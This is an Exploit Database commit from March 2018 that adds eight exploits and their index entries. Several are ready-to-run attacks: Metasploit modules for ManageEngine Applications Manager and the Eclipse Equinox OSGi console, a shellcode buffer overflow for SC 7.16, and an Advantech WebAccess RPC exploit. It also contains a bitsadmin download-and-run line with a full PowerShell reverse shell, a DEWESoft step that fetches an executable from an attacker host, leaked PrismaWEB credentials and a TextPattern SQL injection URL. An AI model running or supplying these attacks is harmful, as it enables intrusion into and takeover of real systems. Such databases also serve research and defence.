DB: 2018-03-13

8 changes to exploits/shellcodes

Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader
Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader

SC 7.16 - Stack-Based Buffer Overflow

DEWESoft X3 SP1 (64-bit) - Remote Command Execution

Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)

ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials
TextPattern 4.6.2 - 'qty' SQL Injection
Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution
ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution
This commit is contained in:
Offensive Security 2018-03-13 05:01:46 +00:00
parent 5947825a84
commit 3f6d16d5c3
9 changed files with 709 additions and 1 deletions

117
exploits/java/webapps/44274.rb Executable file
View file

@ -0,0 +1,117 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Applications Manager Remote Code Execution",
'Description' => %q{
This module exploits command injection vulnerability in the ManageEngine Application Manager product.
An unauthenticated user can execute a operating system command under the context of privileged user.
Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
by accessing given system. This endpoint calls a several internal classes and then executes powershell script
without validating user supplied parameter when the given system is OfficeSharePointServer.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2018-7890'],
['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'RPORT' => 9090
},
'Payload' =>
{
'BadChars' => "\x22"
},
'Platform' => ['win'],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' => [ ['Automatic', {}] ],
'Privileged' => true,
'DisclosureDate' => 'Mar 7 2018',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
]
)
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
'vars_post' => {
'method' => 'testCredentialForConfMonitors',
'type' => 'OfficeSharePointServer',
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',
'Powershell' => 'True', # :-)
'CredSSP' => 'False',
'SPType' => 'SPServer',
'CredentialDetails' => 'nocm',
'Password' => Rex::Text.rand_text_alpha(3),
'UserName' => Rex::Text.rand_text_alpha(3)
}
})
if res && res.body.include?('Kindly check the credentials and try again')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
powershell_options = {
encode_final_payload: true,
remove_comspec: true
}
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
print_status('Triggering the vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
'vars_post' => {
'method' => 'testCredentialForConfMonitors',
'type' => 'OfficeSharePointServer',
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',
'Powershell' => 'True', # :-)
'CredSSP' => 'False',
'SPType' => 'SPServer',
'CredentialDetails' => 'nocm',
'Password' => Rex::Text.rand_text_alpha(3),
'UserName' => "$(#{p})"
}
})
end
end

78
exploits/linux/local/44279.py Executable file
View file

@ -0,0 +1,78 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Bug found using Exploit Pack - Local fuzzer feature.
#
# Tested on: GNU/Linux - Kali Linux
# Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb
#
# Description: SC v7.16 is prone to a basic stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: SC v7.16 -
http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html
#
#
#[----------------------------------registers-----------------------------------]
#EAX: 0x0
#EBX: 0x41414141 ('AAAA')
#ECX: 0x42 ('B')
#EDX: 0x1
#ESI: 0x41414141 ('AAAA')
#EDI: 0x41414141 ('AAAA')
#EBP: 0x41414141 ('AAAA')
#ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047)
#EIP: 0x41424344 ('DCBA')
#EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT
direction overflow)
#[-------------------------------------code-------------------------------------]
#Invalid $PC address: 0x41424344
#[------------------------------------stack-------------------------------------]
#0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047)
#0004| 0xbfffee34 --> 0x1
#0008| 0xbfffee38 --> 0x0
#0012| 0xbfffee3c --> 0x0
#0016| 0xbfffee40 --> 0xf63d4e2e
#0020| 0xbfffee44 --> 0xb7fe4bf9 (<do_lookup_x+1689>: add esp,0x20)
#0024| 0xbfffee48 --> 0x1
#0028| 0xbfffee4c --> 0x1
#[------------------------------------------------------------------------------]
#Legend: code, data, rodata, value
#Stopped reason: SIGSEGV
#0x41424344 in ?? ()
#gdb-peda$ backtrace
##0 0x41424344 in ?? ()
##1 0xbffff100 in ?? ()
#Backtrace stopped: previous frame inner to this frame (corrupt stack?)
#gdb-peda$
#
#==2332==
#==2332== Jump to the invalid address stated on the next line
#==2332== at 0x41424344: ???
#==2332== Address 0x41424344 is not stack'd, malloc'd or (recently) free'd
#==2332==
#==2332==
#==2332== Process terminating with default action of signal 11 (SIGSEGV)
#==2332== Access not within mapped region at address 0x41424344
#==2332== at 0x41424344: ???
import subprocess
import os
buffersize = 1052
nopsled = "\x90"
# Shell
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x10\xf0\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
try:
subprocess.call(["/usr/bin/sc", buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "SC binary not found!"
else:
print "Error executing exploit"
raise

118
exploits/multiple/remote/44280.rb Executable file
View file

@ -0,0 +1,118 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
TELNET_IAC = Msf::Exploit::Remote::Telnet
def initialize(info = {})
super(update_info(info,
'Name' => 'Eclipse Equinoxe OSGi Console Command Execution',
'Description' => %q{
Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
'fork' command to execute arbitrary commands on the remote system..
},
'Author' =>
[
'Quentin Kaiser <kaiserquentin@gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
],
'Platform' => %w{ linux win },
'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
'Targets'=> [
[ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
[ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
],
'CmdStagerFlavor' => [ 'bourne' ],
'DisclosureDate' => 'Feb 13 2018',
'DefaultTarget' => 0))
deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
register_options([
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
])
end
def check
connect
res = sock.get_once
if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
# terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
res = sock.get_once
end
disconnect
if res && res == "osgi> "
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
begin
print_status("Accessing the OSGi console ...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
end
if target['Platform'] == "win" then
exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
else
execute_cmdstager({:flavor => :bourne})
end
print_status("#{rhost}:#{rport} - Waiting for session...")
(datastore['TIME_WAIT']).times do
Rex.sleep(1)
# Success! session is here!
break if session_created?
end
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
def exec_command(cmd)
connect
res = sock.get_once
if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
res = sock.get_once
end
print_status("Exploiting...")
sock.put("#{cmd}\r\n")
res = sock.get
sock.put("disconnect\r\n")
res = sock.get
sock.put("y\r\n")
end
def execute_command(cmd, opts={})
cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
# Runtime.getRuntime().exec() workaround on Linux. Requires bash.
exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
end
end

View file

@ -0,0 +1,36 @@
Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
Vendor: Prisma Industriale S.r.l.
Product web page: https://www.prismaindustriale.com
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
Summary: Web Administration of Machine.
Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
an attacker to effectively bypass authentication of PrismaWEB with administrator
privileges. The credentials can be disclosed by simply navigating to the login_par.js
JavaScript page that holds the username and password for the management interface that
are being used via the Login() function in /scripts/functions_cookie.js script.
Tested on: HMS AnyBus-S WebServer
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5453
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
06.02.2018
---
$ curl http://10.10.10.70/user/scripts/login_par.js
// JavaScript Document
// 11 Dicembre 2009 Release 1.0 Rev.10
var txtChkUser = "prismaweb"; // Nome utente Login
var txtChkPassword = "prisma"; // Password Login

View file

@ -0,0 +1,87 @@
=============================================
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised: March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=============================================
I. VULNERABILITY
-------------------------
SQL Injection in Textpattern <= 4.6.2
II. BACKGROUND
-------------------------
Textpattern is a free and open-source content management system (CMS) based
on PHP and MySQL, originally developed by Dean Allen and now developed by
Team Textpattern.
III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code in the variable "qty" on the page
"index.php".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
SQL injection.
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
Note: the variable "_txp_token" doest not work as a anti-csrf.
POC:
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'%
5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Textpattern <= 4.6.2
VII. SOLUTION
-------------------------
Disable website until a fix is available.
VIII. REFERENCES
-------------------------
https://textpattern.com/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Send to vendor without response
February 26, 2018 3: Second email to vendor without response
March 12, 2018 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

View file

@ -0,0 +1,100 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security
Vendor:
=============
www.dewesoft.com
Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe
Vulnerability Type:
===================
Remote Internal Command Access
CVE Reference:
==============
CVE-2018-7756
Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe
OR
Launch the victims browser and send them to website for a drive-by download etc.
TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe
Then from the TELNET session execute it from Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replys, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

View file

@ -0,0 +1,74 @@
#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
# Date: 03-11-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
# Version: Advantech WebAccess 8.2-2017.08.18
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16720
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/
import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport
def call(dce, opcode, stubdata):
dce.call(opcode, stubdata)
res = -1
try:
res = dce.recv()
except Exception, e:
print "Exception encountered..." + str(e)
sys.exit(1)
return res
if len(sys.argv) != 2:
print "Provide only host arg"
sys.exit(1)
port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0"
host = sys.argv[1]
string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()
print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)
print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
print "Something went wrong"
sys.exit(1)
res = struct.unpack("III", res)
if (len(res) < 3):
print "Received unexpected length value"
sys.exit(1)
print "...3"
# ioctl 0x2711
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
command = "..\\..\\windows\\system32\\calc.exe"
fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)
call(dce, 1, stubdata)
print "\nDid it work?"
dce.disconnect()

View file

@ -0,0 +1,90 @@
# Exploit Title: Arbitrary Code Execution
# Google Dork: N/A
# Date: 03-07-2018
# Exploit Author: Clutchisback1
# Vendor Homepage: https://www.acl.com
# Software Link: https://www.acl.com/products/acl-analytics/
# Version: 11.x - 13.0.0.579
# Tested on: Windows 7 pro SP1 x86
#########################################################################
#
#
# Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
# Welcome to A_C_SHELLLLLL!!
# All Glory to Yeshua
# Shoutouts to my Menotor: Ch33z_plz for teaching me everyday
# and my Offsec Mentor: T0w3ntum introducing me to netsec!
# (I have consent for those mentions :D)
#
#
#########################################################################
EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
EXECUTE "powershell C:\temp\shell.ps1"
Description/Usage:
Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1.
The second `Execute` command will execute the stored payload
Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
END

View file

@ -9573,7 +9573,7 @@ id,file,description,date,author,type,platform,port
44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
@ -9587,6 +9587,7 @@ id,file,description,date,author,type,platform,port
44267,exploits/windows/local/44267.md,"Tor (Firefox 41 < 50) - Code Execution",2016-12-01,649,local,windows,
44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,
44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16064,6 +16065,7 @@ id,file,description,date,author,type,platform,port
43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix,
43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi,
44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows,
43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876
@ -16318,6 +16320,7 @@ id,file,description,date,author,type,platform,port
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38743,6 +38746,7 @@ id,file,description,date,author,type,platform,port
42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
44274,exploits/java/webapps/44274.rb,"ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)",2018-03-12,"Mehmet Ince",webapps,java,
42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
42980,exploits/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",webapps,php,
@ -38973,6 +38977,7 @@ id,file,description,date,author,type,platform,port
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
@ -38987,3 +38992,6 @@ id,file,description,date,author,type,platform,port
44261,exploits/php/webapps/44261.txt,"Redaxo CMS Addon MyEvents 2.2.1 - SQL Injection",2018-03-07,h0n1gsp3cht,webapps,php,80
44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000
44272,exploits/php/webapps/44272.txt,"Bacula-Web < 8.0.0-rc2 - SQL Injection",2018-03-09,"Gustavo Sorondo",webapps,php,
44277,exploits/php/webapps/44277.txt,"TextPattern 4.6.2 - 'qty' SQL Injection",2018-03-12,"Manuel García Cárdenas",webapps,php,
44278,exploits/windows/webapps/44278.py,"Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution",2018-03-12,"Chris Lyne",webapps,windows,
44281,exploits/windows/webapps/44281.txt,"ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution",2018-03-12,Clutchisback1,webapps,windows,

Can't render this file because it is too large.